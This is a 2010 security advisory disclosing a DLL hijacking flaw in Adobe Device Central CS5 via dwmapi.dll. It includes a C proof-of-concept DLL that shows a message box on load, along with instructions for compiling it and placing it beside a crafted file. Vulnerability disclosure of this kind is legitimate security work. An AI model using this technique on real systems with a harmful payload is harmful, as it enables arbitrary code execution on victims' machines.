Adobe Device Central CS5 v3.0.1.0 (dwmapi.dll) DLL Hijacking Exploit

2010-08-26 00:00:00
Gjoko Krstic
zeroscience.mk

7.7 High

AI Score

Confidence

Low

Title: Adobe Device Central CS5 v3.0.1.0 (dwmapi.dll) DLL Hijacking Exploit
Advisory ID: ZSL-2010-4950
Type: Local/Remote
Impact: System Access
Risk: (4/5)
Release Date: 26.08.2010

Summary

Adobe® Device Central CS5 software simplifies the production of innovative and compelling content for mobile phones and consumer electronics devices. Adobe Device Central CS5 now offers support for HTML and the latest versions of Adobe Flash® Player software.

Description

Adobe Device Central CS5 suffers from a DLL hijacking vulnerability that enables an attacker to execute arbitrary code on a local level. The vulnerable file extensions are .adcp, .adpp, .advs, .ascs and .prf, through the dwmapi.dll library.

Vendor

Adobe Systems Inc. - <http://www.adobe.com>

Affected Version

CS5 v3.0.1.0 (3027)

Tested On

Microsoft Windows XP Professional SP3 (English)

Vendor Status

N/A

PoC

adobedc_dll.c

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://packetstormsecurity.org/filedesc/adobedc_dll.txt.html>
[2] <http://www.corelan.be:8800/index.php/2010/08/25/dll-hijacking-kb-2269637-the-unofficial-list/>
[3] <http://www.exploit-db.com/dll-hijacking-vulnerable-applications/>

Changelog

[26.08.2010] - Initial release
[27.08.2010] - Added reference [1], [2] and [3]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

```c
/*

 Adobe Device Central CS5 v3.0.1.0 (dwmapi.dll) DLL Hijacking Exploit

 Vendor: Adobe Systems Inc.
 Product Web Page: http://www.adobe.com
 Affected Version: CS5 v3.0.1.0 (3027)

 Summary: Adobe® Device Central CS5 software simplifies the production
 of innovative and compelling content for mobile phones and consumer
 electronics devices. Adobe Device Central CS5 now offers support for
 HTML and the latest versions of Adobe Flash® Player software.

 Desc: Adobe Device Central CS5 suffers from a dll hijacking vulnerability
 that enables the attacker to execute arbitrary code on a local level. The
 vulnerable extensions are .adcp, .adpp, .advs, .ascs and .prf thru dwmapi.dll
 library.

 ----
 gcc -shared -o dwmapi.dll adobedc.c

 Compile and rename to dwmapi.dll, create a file test.adcp or any of the above
 vulnerable extensions and put both files in same dir and execute.
 ----

 Tested on Microsoft Windows XP Professional SP3 (EN)

 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk

 25.08.2010

*/

#include <windows.h>

/* Forward declaration: dll_mll() is called from DllMain before its definition. */
int dll_mll(void);

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
			/* Runs once, when the host process loads this DLL. */
			dll_mll();
			break;
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
			break;
	}

	return TRUE;
}

/* Proof marker only: shows a message box to demonstrate that the DLL was loaded. */
int dll_mll(void)
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
	return 0;
}
```